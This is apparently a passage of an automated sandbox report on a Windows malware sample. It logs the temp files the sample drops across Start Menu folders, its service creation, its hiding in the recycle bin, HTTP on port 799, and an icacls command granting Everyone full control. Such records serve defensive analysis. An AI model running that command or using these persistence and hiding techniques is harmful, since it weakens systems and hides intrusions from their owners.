Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\~SDBE4E.tmp	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Java\~SDBE4F.tmp	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\~SD6864.tmp	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\~SD6875.tmp	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\~SDB59E.tmp	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\~SDB59F.tmp	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\7-Zip\~SDB5A0.tmp	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Accessibility\~SDB5A1.tmp	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Accessories\~SDB5A2.tmp	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Administrative Tools\~SDB5A3.tmp	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\AutoIt v3\~SDB5A4.tmp	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\AutoIt v3\Extras\~SDB5D4.tmp	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Java\~SDB5D5.tmp	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Maintenance\~SDB5D6.tmp	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\StartUp\~SDB5D7.tmp	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\System Tools\~SDB5D8.tmp	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Windows PowerShell\~SDB5D9.tmp	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\~SD4911.tmp	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\~SD4912.tmp	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\7-Zip\~SD4913.tmp	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\Accessibility\~SD4914.tmp	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\Accessories\~SD4915.tmp	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\Administrative Tools\~SD4926.tmp	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\AutoIt v3\~SD4927.tmp	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\~SD4928.tmp	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\Java\~SD4929.tmp	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\Maintenance\~SD492A.tmp	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\StartUp\~SD492B.tmp	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\System Tools\~SD492C.tmp	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\~SD492D.tmp	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\~SD885.tmp	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\~SD886.tmp	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\7-Zip\~SD887.tmp	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Accessibility\~SD888.tmp	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Accessories\~SD889.tmp	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Accessories\System Tools\~SD88A.tmp	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Administrative Tools\~SD88B.tmp	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\AutoIt v3\~SD88C.tmp	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\AutoIt v3\Extras\~SD88D.tmp	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\AutoIt v3\Extras\AutoItX\~SD88E.tmp	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Java\~SD89E.tmp	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Maintenance\~SD89F.tmp	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Microsoft Office Tools\~SD8A0.tmp	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\StartUp\~SD8A1.tmp	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\System Tools\~SD8A2.tmp	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Windows PowerShell\~SD7D66.tmp	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\~SDC7A9.tmp	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\~SDC7AA.tmp	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\7-Zip\~SDC7AB.tmp	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\Accessibility\~SDC7AC.tmp	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\Accessories\~SDC7BC.tmp	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\~SDC7BD.tmp	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\Administrative Tools\~SDC7BE.tmp	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\AutoIt v3\~SDC7BF.tmp	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\~SDC7C0.tmp	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX\~SDC7C1.tmp	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\Java\~SDC7C2.tmp	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\Maintenance\~SDC7C3.tmp	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\Microsoft Office Tools\~SDC7C4.tmp	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\StartUp\~SDC7C5.tmp	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\System Tools\~SDC7C6.tmp	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\~SDC7C7.tmp	Jump to behavior

Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe

Code function: 0_2_00401CE8 OpenSCManagerA,OpenServiceA,StartServiceA,CloseServiceHandle,sprintf,CreateServiceA,StartServiceA,CloseServiceHandle,CloseServiceHandle,

0_2_00401CE8

Hooking and other Techniques for Hiding and Protection

Creates files in the recycle bin to hide itself

Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe

File created: C:\$Recycle.Bin\~SD2588.tmp

Jump to behavior

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 799

Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe

Process created: C:\Windows\SysWOW64\icacls.exe icacls . /grant Everyone:F /T /C /Q

Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wBQInv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\wBQInv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\wBQInv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
